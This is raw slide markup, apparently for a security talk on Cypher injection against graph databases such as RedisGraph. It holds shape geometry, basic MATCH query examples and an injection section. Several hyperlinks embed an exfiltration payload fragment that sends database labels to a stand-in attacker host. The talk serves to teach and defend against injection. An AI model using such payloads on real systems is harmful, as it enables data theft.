                  <a:cubicBezTo>
                    <a:pt x="351" y="372"/>
                    <a:pt x="339" y="385"/>
                    <a:pt x="327" y="397"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="327" y="397"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="414"/>
                    <a:pt x="277" y="422"/>
                    <a:pt x="250" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="422"/>
                    <a:pt x="168" y="405"/>
                    <a:pt x="140" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="270"/>
                    <a:pt x="106" y="131"/>
                    <a:pt x="176" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="78"/>
                    <a:pt x="233" y="69"/>
                    <a:pt x="258" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1"/>
                    <a:pt x="169" y="9"/>
                    <a:pt x="140" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="131"/>
                    <a:pt x="1" y="307"/>
                    <a:pt x="106" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="462"/>
                    <a:pt x="190" y="485"/>
                    <a:pt x="234" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="485"/>
                    <a:pt x="293" y="475"/>
                    <a:pt x="321" y="456"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="321" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="458"/>
                    <a:pt x="324" y="459"/>
                    <a:pt x="327" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="459"/>
                    <a:pt x="338" y="455"/>
                    <a:pt x="348" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="409"/>
                    <a:pt x="487" y="237"/>
                    <a:pt x="454" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="57"/>
                    <a:pt x="318" y="1"/>
                    <a:pt x="234" y="1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3649400" y="838225"/>
              <a:ext cx="13025" cy="11775"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="471" w="521">
                  <a:moveTo>
                    <a:pt x="276" y="77"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="77"/>
                    <a:pt x="392" y="126"/>
                    <a:pt x="418" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="418" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="418" y="302"/>
                    <a:pt x="411" y="320"/>
                    <a:pt x="402" y="336"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="402" y="336"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="390"/>
                    <a:pt x="306" y="420"/>
                    <a:pt x="249" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="420"/>
                    <a:pt x="176" y="408"/>
                    <a:pt x="140" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="280"/>
                    <a:pt x="104" y="141"/>
                    <a:pt x="209" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="85"/>
                    <a:pt x="253" y="77"/>
                    <a:pt x="276" y="77"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="266" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="0"/>
                    <a:pt x="176" y="11"/>
                    <a:pt x="140" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="141"/>
                    <a:pt x="1" y="314"/>
                    <a:pt x="104" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="455"/>
                    <a:pt x="200" y="470"/>
                    <a:pt x="244" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="470"/>
                    <a:pt x="305" y="462"/>
                    <a:pt x="330" y="449"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="330" y="449"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="335" y="451"/>
                    <a:pt x="341" y="453"/>
                    <a:pt x="348" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="419"/>
                    <a:pt x="521" y="244"/>
                    <a:pt x="451" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="39"/>
                    <a:pt x="348" y="0"/>
                    <a:pt x="266" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="70C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0" name="Google Shape;960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ontserrat Black"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="25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720000" y="1681225"/>
            <a:ext cx="7704000" cy="28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47.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId10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Relationship Id="rId8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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId6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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId5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ttacker.burpcollaborator.net/'+label" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attacker.burpcollaborator.net/'+label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52.png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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62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9.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId10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Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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redis.io/docs/stack/graph/cypher_support/#parameters" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.io/commands/graph.query/#procedures" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redis.io/docs/stack/graph/cypher_support/#string-functions" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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noypearl/cypher-playground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www.sidechannel.blog/en/the-cypher-injection-saga/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/morkin1792/CIWA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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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.png"/><Relationship Id="rId10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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304650" y="1145975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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283125" y="2012150"/>
            <a:ext cx="6906300" cy="16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3700"/>
              <a:t>The New “SQL Injection”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3700"/>
              <a:t>We Aren’t Aware Of</a:t>
            </a:r>
            <a:endParaRPr sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3126" name="Google Shape;3126;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69350" y="4560300"/>
            <a:ext cx="25218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Noy Pearl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7" name="Google Shape;3127;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736650" y="1167525"/>
            <a:ext cx="76707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Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3128" name="Google Shape;3128;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="47696" r="0" t="4725"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569650" y="3248225"/>
            <a:ext cx="1269725" cy="17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9" name="Google Shape;3129;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="55293" t="9534"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128575" y="2176787"/>
            <a:ext cx="1085300" cy="16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0" name="Google Shape;3130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0" name="Shape 3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1" name="Google Shape;3251;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="99000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196100" y="200000"/>
            <a:ext cx="864611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2" name="Google Shape;3252;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296425" y="689875"/>
            <a:ext cx="951900" cy="951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3" name="Google Shape;3253;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7147200" y="257200"/>
            <a:ext cx="951900" cy="951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Google Shape;3254;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775950" y="1951325"/>
            <a:ext cx="951900" cy="9519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5" name="Google Shape;32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8025" y="1641775"/>
            <a:ext cx="1029100" cy="10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6" name="Google Shape;325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726" y="3601046"/>
            <a:ext cx="951900" cy="95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7" name="Google Shape;325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8025" y="200000"/>
            <a:ext cx="984950" cy="98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8" name="Google Shape;325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2475" y="4010400"/>
            <a:ext cx="951900" cy="9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9" name="Google Shape;3259;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5488" l="18740" r="17078" t="22093"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7775950" y="1986987"/>
            <a:ext cx="951900" cy="88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0" name="Google Shape;326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47200" y="281350"/>
            <a:ext cx="951900" cy="903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1" name="Google Shape;3261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331375" y="735175"/>
            <a:ext cx="916800" cy="88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262" name="Google Shape;3262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79775" y="1531350"/>
            <a:ext cx="1174476" cy="1174476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3263" name="Google Shape;32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8" name="Google Shape;326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9143999" cy="231377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9" name="Google Shape;3269;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="8366"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729150" y="2829725"/>
            <a:ext cx="3414849" cy="231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0" name="Google Shape;327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12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308600" y="3889575"/>
            <a:ext cx="6363900" cy="688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p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-92475" y="3720075"/>
            <a:ext cx="9144000" cy="14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MATCH</a:t>
            </a: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 (c:Character {name:"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="31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Spongebob</a:t>
            </a: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"}) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="31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b="1" lang="en" sz="31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3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7" name="Google Shape;3277;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="637475" y="219700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800"/>
              <a:t>Terms</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3278" name="Google Shape;3278;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2034100" y="805250"/>
            <a:ext cx="1337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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node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3279" name="Google Shape;32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175" y="1358425"/>
            <a:ext cx="6323024" cy="18310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280" name="Google Shape;3280;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2702800" y="1187625"/>
            <a:ext cx="0" cy="353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1" name="Google Shape;3281;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3099605" y="805270"/>
            <a:ext cx="2781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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Relationship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82" name="Google Shape;3282;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490550" y="1222575"/>
            <a:ext cx="0" cy="95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3" name="Google Shape;3283;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785436" y="805250"/>
            <a:ext cx="13374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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Node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84" name="Google Shape;3284;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6454125" y="1222575"/>
            <a:ext cx="0" cy="482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5" name="Google Shape;3285;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043500" y="3472250"/>
            <a:ext cx="1970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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Variable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86" name="Google Shape;3286;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137000" y="3887925"/>
            <a:ext cx="0" cy="17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7" name="Google Shape;3287;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2413805" y="3472270"/>
            <a:ext cx="27819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>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Label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88" name="Google Shape;3288;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804750" y="3889575"/>
            <a:ext cx="0" cy="171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9" name="Google Shape;3289;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4566221" y="3472250"/>
            <a:ext cx="18087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400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Property</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3290" name="Google Shape;3290;p12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234925" y="3889575"/>
            <a:ext cx="0" cy="19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91" name="Google Shape;329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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386300" y="1129825"/>
            <a:ext cx="7801800" cy="2796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Google Shape;3297;p13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Goodbye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH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98" name="Google Shape;3298;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441575" y="973488"/>
            <a:ext cx="8527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600" u="sng"/>
              <a:t>Get all Characters:  </a:t>
            </a:r>
            <a:endParaRPr sz="2600" u="sng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600">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> (c:Character) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> c</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3299" name="Google Shape;3299;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="4223" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6256050" y="2811900"/>
            <a:ext cx="2931626" cy="23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0" name="Google Shape;3300;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441575" y="2312800"/>
            <a:ext cx="91017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sng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Get Character by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="2600" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="6AA84F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name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="2600" u="sng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:</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2600" u="sng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0" i="0" lang="en" sz="2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(c:Character) </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="26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0" i="0" lang="en" sz="2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c.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="2600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="6AA84F"/>
                </a:highlight>
                <a:latin typeface="Montserrat Black"/>
                <a:ea typeface="Montserrat Black"/>
                <a:cs typeface="Montserrat Black"/>
                <a:sym typeface="Montserrat Black"/>
              </a:rPr>
              <a:t>‘Spongebob’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="2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b="0" i="0" lang="en" sz="26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0" i="0" lang="en" sz="26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c</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="26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301" name="Google Shape;330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p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755350" y="903250"/>
            <a:ext cx="4801500" cy="2316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7" name="Google Shape;3307;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2871200" y="1510750"/>
            <a:ext cx="63252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400"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:endParaRPr sz="7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400"/>
              <a:t>Time!</a:t>
            </a:r>
            <a:endParaRPr sz="7400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3308" name="Google Shape;3308;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="5473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-663675" y="1510750"/>
            <a:ext cx="4906175" cy="36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9" name="Google Shape;330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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626901" y="2966600"/>
            <a:ext cx="5890200" cy="1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800">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In A Nutshell</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3315" name="Google Shape;3315;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2062150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7200"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3316" name="Google Shape;331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0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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433525" y="876500"/>
            <a:ext cx="8497800" cy="1861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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3500" y="854225"/>
            <a:ext cx="95448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5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SELECT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lang="en" sz="25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FROM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“characters” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="25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 name = “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="22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Spongebob</a:t>
            </a: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b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3323" name="Google Shape;3323;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="2371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SQLi In A Nutshell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3324" name="Google Shape;3324;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="2858950"/>
            <a:ext cx="478500" cy="2033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Google Shape;3325;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="2858950"/>
            <a:ext cx="478500" cy="424200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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endParaRPr b="1" i="1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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="3261236"/>
            <a:ext cx="4785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16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="3663521"/>
            <a:ext cx="4785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8" name="Google Shape;3328;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="4065807"/>
            <a:ext cx="4785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9" name="Google Shape;3329;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270600" y="4468100"/>
            <a:ext cx="4785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0" name="Google Shape;3330;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="2858950"/>
            <a:ext cx="1610100" cy="20334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1" name="Google Shape;3331;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="2858950"/>
            <a:ext cx="1610100" cy="424200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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1" i="1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p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="3261234"/>
            <a:ext cx="16101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Spongebob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3" name="Google Shape;3333;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="3663519"/>
            <a:ext cx="16101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Patrick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Google Shape;3334;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="4459319"/>
            <a:ext cx="16101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Squidward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Google Shape;3335;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3740502" y="4065803"/>
            <a:ext cx="1610100" cy="424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Sandy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p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323125" y="1463825"/>
            <a:ext cx="53364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 sz="2100">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
